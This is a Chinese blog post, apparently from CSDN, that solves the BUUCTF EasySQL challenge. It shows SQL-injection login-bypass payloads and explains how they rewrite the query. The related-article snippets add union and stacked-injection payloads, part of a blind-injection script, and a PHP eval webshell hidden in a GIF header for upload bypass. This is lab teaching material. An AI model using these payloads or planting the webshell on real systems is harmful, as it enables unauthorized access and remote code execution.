buuctf EasySQL [极客大挑战 2019] 刷题笔记

最新推荐文章于 2024-05-13 09:10:34 发布

Kavint

最新推荐文章于 2024-05-13 09:10:34 发布

阅读量223

点赞数

分类专栏： CTF刷题文章标签： sql web安全网络安全

本文链接：https://blog.youkuaiyun.com/Kavint/article/details/129327737

版权

解题思路

如图，登陆界面的SQL注入题目，首先想到的就是万能密码

输入用户名'or '1'='1'#

密码随便输入，比如123

万能密码的原理是利用or和and的优先级来使得后面的where子句为真

我们输入的payload放入sql完整语句如下

"select * from user where username=''or '1'='1'#and password='123' "

#后面的内容都被注释掉了，前面‘1’=‘1’，or语句左右有一处为真整条语句便为true

成功登陆

新想法

最近发现了一个特殊的万能密码

用户名随便填一串字符加上'='

例如dadawdaw'='

密码也是

就会如下

"select * from user where username='dawdawdaw'=''and password='dawdadda'=

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Kavint

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ctf(EasySQL)

Glacier_Mount的博客

10-07

741

查询语句的简单猜测

buuctf [极客大挑战 2019]FinalSQL

zoixsoadji的博客

03-30

870

进入题目，又是这个作者，试试万能密码经过实验，双写什么的都没用。作者说的神秘代码，点进去发现url变了发现并没有什么卵用…… 正当我没有头绪的时候，我突然看到一句话，审题真的很重要：盲注！这里附上大佬的脚本： import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF刷题笔记——[极客大挑战 2019]EasySQL 1

永远是少年

07-05

1563

今天继续刷BUUCTF的题，今天解决[极客大挑战 2019]EasySQL 1。一、题目基本信息二、解题思路三、拿到flag

[极客大挑战 2019]EasySQL BUUCTF靶场

叶子的Blog

10-19

224

知识背景 PHP SQL注入漏洞万能密码解题过程首先在用户名处输入单引号判断一下闭合方式发现可以显示报错信息可以判断闭合方式为单引号尝试使用万能密码绕过 payload ?username=admin' or '1'='1&password=test' or '1'='1 ...

[BUUCTF]极客大挑战 2019EasySQL1 write up

GZWZ_的博客

03-25

3363

这道题很简单，就是想推一下万能密码，So浅写一下啦！

BuuCTF _随便注_easy_sql

羽的博客

06-29

272

常规方法试试水可以看到表内所有的内容用联合注入到这里的时候发现了过滤，过滤掉了很多关键字。不过show没过滤。换方法：堆叠注入堆叠注入 1、看所有的库 2、看所有的表 3、看表的内容： 1'; show columns from 表名; #（数字串为表名的表操作时要加反引号）看不到内容 MySQL 的 show、rename 和 alter 命令： show 可以用于查看当前数据库，当前表，以及表中的...

BUUCTF [极客大挑战 2019]FinalSQL

Chu_Jian_Xiong的博客

10-14

1393

[极客大挑战 2019]FinalSQL操作脚本总结操作打开题目，又是这个鬼跟着他的流程走，点按钮让我们试试别的告诉我们对了，但是不是这张表（埋坑）怀疑这个地址是存在sql注入的，经过fuzz，发现过滤了空格，union之类的关键字，经过一系列的尝试，猜想后台原句 select * from 表 where id=1 通过构造语句，发现正确的页面回显 ''or(ascii(substr(database(),1,1))>32) 接下来就是拿脚本盲注了注入了以下是注入发现的信息

[网络安全 CTF] BUUCTF极客大挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)_[极客大挑战 2019]php

2401_84971538的博客

05-13

731

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！

BUUCTF——[极客大挑战 2019]Secret File 1

2303_77380355的博客

03-27

275

用burpsuite抓包，发现一个注释链接。得到base64，进行解码得到flag。F12查看源码，进入链接。进入flag.php查看。F12查看源码，没有东西。点击SECRET进入。F12源码里没有东西。进入链接发现一串源码。

极客网个人刷题记录汇总

qq_21924213的博客

04-10

447

1.在一个二维数组中（每个一维数组的长度相同），每一行都按照从左到右递增的顺序排序，每一列都按照从上到下递增的顺序排序。请完成一个函数，输入这样的一个二维数组和一个整数，判断数组中是否含有该整数。 /** * 思路：左下角的值是一行中最小，一列中最大的，所以从这个值开始比较，如果比这个值大，就将列加1，再比较， * 如果比这个值小，就将行加1，往上查，总的时间复杂度为O...

BUUCTF-web类-第四题 [SUCTF 2019]EasySQL

weixin_44622228的博客

04-16

541

BUUCTF-web类-第四题 [SUCTF 2019]EasySQL进入靶场，看到页面只有一个表单，结合题目EasySQL，猜测是注入输入1,返回数组Array([0]=>1),于是输入1’，发现没有任何回显了，于是尝试各种基本测试手段，order by等等，发现回显Nonono。之后发现存在堆叠注入，查看数据库查看表查询Flag表中信息发现查看不了，这时候想到估计要涉及到骚操作...

[SWPUCTF 2021 新生赛]easy_sql

zoixsoadji的博客

05-06

1564

感谢平台Nssctf 进入题目，说是让我们输入点东西，f12打开源代码，发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点先查看有几个库：?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显：?wllm=union select 1,2,3--+ 看到回显位是2，3，查库名:?wllm=-1' union select 1,2,databas.

BUUCTF-wp-极客大挑战的easy sql

Accompany的博客

11-28

2845

一个小小的分享，对于BUUCTF 极客大挑战中easy sql 的解法打开web题目，发现是一个登陆页面，我们首先就要想到sql注入，用万能密码进行尝试，如下：使用万能密码后恰巧登陆成功可得到flag

buuctf easysql

zzqzzq11的博客

08-06

471

buuctf

BUUCTF-随便注（easy_sql）

weixin_51383898的博客

10-13

926

启动靶机，首先有一个输入框，提交查询，返回一个数组将数值改成3，页面没有显示输入2，有结果，最大输入为2输入1'出现报错，参数为字符型，需要闭合单引号出现报错，尝试报错注入，被过滤了使用联合注入，过滤了关键字select，没有用尝试使用万能语句，好像没啥用，得到的信息和flag没有关联尝试使用堆叠注入，成功了发现有个数据库，查看该数据库下有哪些表有个FLAG_TABLE表，查看table表有哪些字段不是flag？？？，看来这个数据库不得行进入supersqli。

[极客大挑战 2019]Havefun1、EasySQL(BUUCTF)

HackerYY的博客

12-31

2365

[极客大挑战2019]的两道水题内附解题过程

buuctf [极客大挑战 2019]Upload 1

最新发布

02-07

### 关于 BUUCTF 极客大挑战 2019 中 Upload 1 题目分析 #### 背景介绍 BUUCTF 是一个知名的网络安全竞赛平台，其中的极客大挑战系列题目涵盖了多种安全漏洞利用技巧。Upload 1 属于文件上传类题目，在这类题目中通常会涉及到服务器端对于上传文件类型的验证机制以及可能存在的绕过方法。 #### 文件上传漏洞原理当 Web 应用程序允许用户上传文件时，如果对上传的内容缺乏严格的安全检查，则可能导致攻击者能够上传恶意脚本并执行任意代码。常见的防御措施包括但不限于 MIME 类型检测、扩展名过滤等[^1]。 #### 解题思路针对此题目的具体实现方式可以归纳为以下几个方面： - **MIME 类型伪造** PHP 使用 `$_FILES` 数组来处理上传的数据，默认情况下仅依赖客户端提供的 Content-Type 头部信息判断文件类型。然而这些头部是可以被轻易篡改的。因此可以通过修改 HTTP 请求中的相应部分使服务端误认为所提交的是合法图片而非其他形式的可执行文件。 - **PHP 后门植入** 利用上述手段成功上传 .php 结尾或其他能被执行解释器解析运行的文件之后，便可以在该文件内嵌入一段用于远程控制目标主机的小段落，比如一句话木马： ```php <?php @eval($_POST['cmd']);?> ``` - **绕过白名单限制** 如果存在基于文件头特征码（magic number）或者图像尺寸大小等方面更严格的校验逻辑的话，那么就需要寻找特定格式下既满足条件又隐藏有潜在威胁特性的样本作为载体；或者是探索是否有其它途径可以直接影响到最终保存路径从而规避掉这部分审核流程。 #### 实际操作案例展示假设当前环境已经确认支持 GIF89a 开始标记并且不会因为后续附加内容而报错的情况下，我们可以构造这样一个混合体——即所谓的“GIFAR”(Gif+Jar) 攻击向量： ```gif GIF89a; <?php @eval($_POST['cmd']);?> ``` 将其命名为 `.jpg.php` 或类似的双后缀命名模式尝试突破单纯的字符串匹配规则限制，并通过浏览器访问触发反序列化过程完成提权动作获取 shell 访问权限。